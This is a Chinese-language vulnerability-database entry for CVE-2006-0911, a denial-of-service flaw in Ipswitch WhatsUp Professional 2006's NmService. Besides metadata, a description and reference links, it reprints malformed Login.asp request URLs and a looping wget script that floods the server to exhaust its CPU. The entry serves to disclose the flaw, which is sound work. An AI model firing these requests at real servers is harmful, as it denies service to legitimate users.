Ipswitch WhatsUp Professional 2006远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109794 漏洞类型 资源管理错误
发布时间 2006-02-22 更新时间 2006-04-26
CVE编号 CVE-2006-0911 CNNVD-ID CNNVD-200602-421
漏洞平台 ASP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/27258
https://cxsecurity.com/issue/WLB-2006020076
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-421
|漏洞详情
WhatsupProfessional软件是Ipswitch公司开发的监视TCP/IP、NetBEUI和IPX网络状态的工具。WhatsupProfessional在处理某些畸形请求时存在问题,远程攻击者可能利用此漏洞对服务器程序执行拒绝服务攻击。WhatsupProfessional的NmService.exe没有正确的处理某些请求。如果用户访问了特制的URL请求的话,就可能导致NmService使用100%的CPU资源,造成拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/16771/info

Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET requests.

This issue allows remote attackers to consume excessive CPU resources on targeted computers, denying service to legitimate users.

http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword=
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn=
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=

An example script to exploit this issue is also available:

while [ 1 ]
do
wget -O /dev/null http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName=
done
|参考资料

来源:MISC
链接:http://zur.homelinux.com/Advisories/ipswitch_dos.txt
来源:XF
名称:whatsup-nmservice-dos(24864)
链接:http://xforce.iss.net/xforce/xfdb/24864
来源:BID
名称:16771
链接:http://www.securityfocus.com/bid/16771
来源:BUGTRAQ
名称:20060222IpSwitchWhatsUpProfessional2006DoS
链接:http://www.securityfocus.com/archive/1/archive/1/425780/100/0/threaded
来源:OSVDB
名称:23494
链接:http://www.osvdb.org/23494
来源:VUPEN
名称:ADV-2006-0704
链接:http://www.frsirt.com/english/advisories/2006/0704
来源:SREASON
名称:472
链接:http://securityreason.com/securityalert/472